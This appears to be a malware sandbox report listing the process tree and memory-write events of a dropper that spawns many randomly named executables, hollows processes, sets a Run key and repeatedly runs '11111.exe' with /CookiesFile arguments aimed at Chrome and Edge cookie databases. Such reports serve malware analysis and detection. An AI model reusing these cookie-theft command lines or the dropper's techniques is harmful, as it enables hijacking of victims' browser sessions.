375C1FFE19F2FBA6FF5F32B4000CDEA4.exe loELqQbmJRQpxMeJ5AAEU5fN.exe PID 4736 wrote to memory of 572 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe loELqQbmJRQpxMeJ5AAEU5fN.exe PID 4736 wrote to memory of 572 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe loELqQbmJRQpxMeJ5AAEU5fN.exe PID 4736 wrote to memory of 2812 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe qTlcjPAmCYslnsQO0fRE5dYW.exe PID 4736 wrote to memory of 2812 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe qTlcjPAmCYslnsQO0fRE5dYW.exe PID 4736 wrote to memory of 2812 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe qTlcjPAmCYslnsQO0fRE5dYW.exe PID 4736 wrote to memory of 4188 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe KbRivSLWxMXy_7RFr0zzm9xk.exe PID 4736 wrote to memory of 4188 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe KbRivSLWxMXy_7RFr0zzm9xk.exe PID 4736 wrote to memory of 4188 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe KbRivSLWxMXy_7RFr0zzm9xk.exe PID 4736 wrote to memory of 1016 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe c_VdWDUCwwtRatLZqa1msoRS.exe PID 4736 wrote to memory of 1016 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe c_VdWDUCwwtRatLZqa1msoRS.exe PID 4736 wrote to memory of 1016 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe c_VdWDUCwwtRatLZqa1msoRS.exe PID 4736 wrote to memory of 548 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe XLKr7Gg3jXYqn3Cb0v5ROYaS.exe PID 4736 wrote to memory of 548 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe XLKr7Gg3jXYqn3Cb0v5ROYaS.exe PID 4736 wrote to memory of 548 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe XLKr7Gg3jXYqn3Cb0v5ROYaS.exe PID 4736 wrote to memory of 1388 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe wXv39P__TJcA2k12V2Zgx03I.exe PID 4736 wrote to memory of 1388 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe wXv39P__TJcA2k12V2Zgx03I.exe PID 4736 wrote to memory of 1388 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe wXv39P__TJcA2k12V2Zgx03I.exe PID 4736 wrote to memory of 1192 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 52gsIfQbxcku44ZeI8702OJN.exe PID 4736 wrote to memory of 1192 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 52gsIfQbxcku44ZeI8702OJN.exe PID 4736 wrote to memory of 1192 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 52gsIfQbxcku44ZeI8702OJN.exe PID 4736 wrote to memory of 1064 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe vri9QJNUrvtCCtcp5iTLexaq.exe PID 4736 wrote to memory of 1064 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe vri9QJNUrvtCCtcp5iTLexaq.exe PID 4736 wrote to memory of 1064 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe vri9QJNUrvtCCtcp5iTLexaq.exe PID 4736 wrote to memory of 1996 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe mJimMqtn6WWB9vVWN43v00Qa.exe PID 4736 wrote to memory of 1996 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe mJimMqtn6WWB9vVWN43v00Qa.exe PID 4736 wrote to memory of 1996 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe mJimMqtn6WWB9vVWN43v00Qa.exe PID 4736 wrote to memory of 2432 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe sItBlTP8i4E25HX__m218TGK.exe PID 4736 wrote to memory of 2432 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe sItBlTP8i4E25HX__m218TGK.exe PID 4736 wrote to memory of 2432 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe sItBlTP8i4E25HX__m218TGK.exe PID 4736 wrote to memory of 4968 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 1U9482xac9Vdw81qeLADoS78.exe PID 4736 wrote to memory of 4968 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 1U9482xac9Vdw81qeLADoS78.exe PID 4736 wrote to memory of 4196 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 1P2iyh2JidvGFh4oERonoUp_.exe PID 4736 wrote to memory of 4196 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 1P2iyh2JidvGFh4oERonoUp_.exe PID 4736 wrote to memory of 4196 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 1P2iyh2JidvGFh4oERonoUp_.exe PID 4736 wrote to memory of 1200 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe HsB706rZ5ITpXQS1ycIHz9Ks.exe PID 4736 wrote to memory of 1200 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe HsB706rZ5ITpXQS1ycIHz9Ks.exe PID 4736 wrote to memory of 1200 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe HsB706rZ5ITpXQS1ycIHz9Ks.exe PID 4736 wrote to memory of 1608 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe mvaT_YqO7KekkPxnX5BA4Fiz.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\375C1FFE19F2FBA6FF5F32B4000CDEA4.exe"C:\Users\Admin\AppData\Local\Temp\375C1FFE19F2FBA6FF5F32B4000CDEA4.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Users\Admin\Documents\49G7lSDL36pm6Tf9CJu2K920.exe"C:\Users\Admin\Documents\49G7lSDL36pm6Tf9CJu2K920.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
C:\Users\Admin\Documents\EZrtSzAMJQfXsQrLCzQybKjh.exe"C:\Users\Admin\Documents\EZrtSzAMJQfXsQrLCzQybKjh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:836 -
C:\Users\Admin\Documents\EZrtSzAMJQfXsQrLCzQybKjh.exe"C:\Users\Admin\Documents\EZrtSzAMJQfXsQrLCzQybKjh.exe"3⤵PID:6632
-
-
-
C:\Users\Admin\Documents\iRqjX4A5YnqgK2YsIoMgdSoD.exe"C:\Users\Admin\Documents\iRqjX4A5YnqgK2YsIoMgdSoD.exe"2⤵
- Executes dropped EXE
PID:840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1980
-
-
-
C:\Users\Admin\Documents\wtASthkTL07xVBxtjE9a02tm.exe"C:\Users\Admin\Documents\wtASthkTL07xVBxtjE9a02tm.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3876 -
C:\Users\Admin\Documents\wtASthkTL07xVBxtjE9a02tm.exe"C:\Users\Admin\Documents\wtASthkTL07xVBxtjE9a02tm.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4580
-
-
-
C:\Users\Admin\Documents\8HEOXyIuppRBNR0NhZp_MAyf.exe"C:\Users\Admin\Documents\8HEOXyIuppRBNR0NhZp_MAyf.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
C:\Users\Admin\Documents\KpjOE9plqshxTez0Y9Dq5Tb5.exe"C:\Users\Admin\Documents\KpjOE9plqshxTez0Y9Dq5Tb5.exe"2⤵
- Executes dropped EXE
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:2540
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:1168
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:468
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:2528
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:6128
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:7104
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:3460
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:6588
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:3996
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:5204
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:4660
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:2064
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:2412
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:836
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:6364
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:772
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:1100
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:3232
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:6468
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:7044
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:984
-
-
-
C:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exe"C:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:548 -
C:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exeC:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:488
-
-
-
C:\Users\Admin\Documents\c_VdWDUCwwtRatLZqa1msoRS.exe"C:\Users\Admin\Documents\c_VdWDUCwwtRatLZqa1msoRS.exe"2⤵
- Executes dropped EXE
PID:1016 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4436
-
-
-
C:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exe"C:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4188 -
C:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exeC:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
-
C:\Users\Admin\Documents\1NpraAWhj4kgz1ajLCCVpFRf.exe"C:\Users\Admin\Documents\1NpraAWhj4kgz1ajLCCVpFRf.exe"2⤵
- Executes dropped EXE
PID:4456
-
-
C:\Users\Admin\Documents\qTlcjPAmCYslnsQO0fRE5dYW.exe"C:\Users\Admin\Documents\qTlcjPAmCYslnsQO0fRE5dYW.exe"2⤵
- Executes dropped EXE
PID:2812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1696
-
-
-
C:\Users\Admin\Documents\VjGNJYTkssviPnxpDIwNcfng.exe"C:\Users\Admin\Documents\VjGNJYTkssviPnxpDIwNcfng.exe"2⤵
- Executes dropped EXE
PID:656 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 3003⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
-
C:\Users\Admin\Documents\loELqQbmJRQpxMeJ5AAEU5fN.exe"C:\Users\Admin\Documents\loELqQbmJRQpxMeJ5AAEU5fN.exe"2⤵
- Executes dropped EXE
PID:572
-
-
C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4796 -
C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"3⤵
- Drops file in Drivers directory
PID:3948 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:2804 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47185⤵PID:2100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:25⤵PID:6384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:35⤵PID:3004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:85⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:15⤵PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:15⤵PID:6080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:15⤵PID:4944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4004 /prefetch:85⤵PID:492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5872 /prefetch:85⤵PID:908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:15⤵PID:2268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6180 /prefetch:85⤵PID:4552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:15⤵PID:3056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:85⤵PID:2856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:85⤵PID:5152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6320 /prefetch:25⤵PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:15⤵PID:680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:15⤵PID:664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:15⤵PID:4836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:15⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:15⤵PID:6076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:15⤵PID:7080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5428 /prefetch:85⤵PID:4888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:85⤵PID:1892
-
-
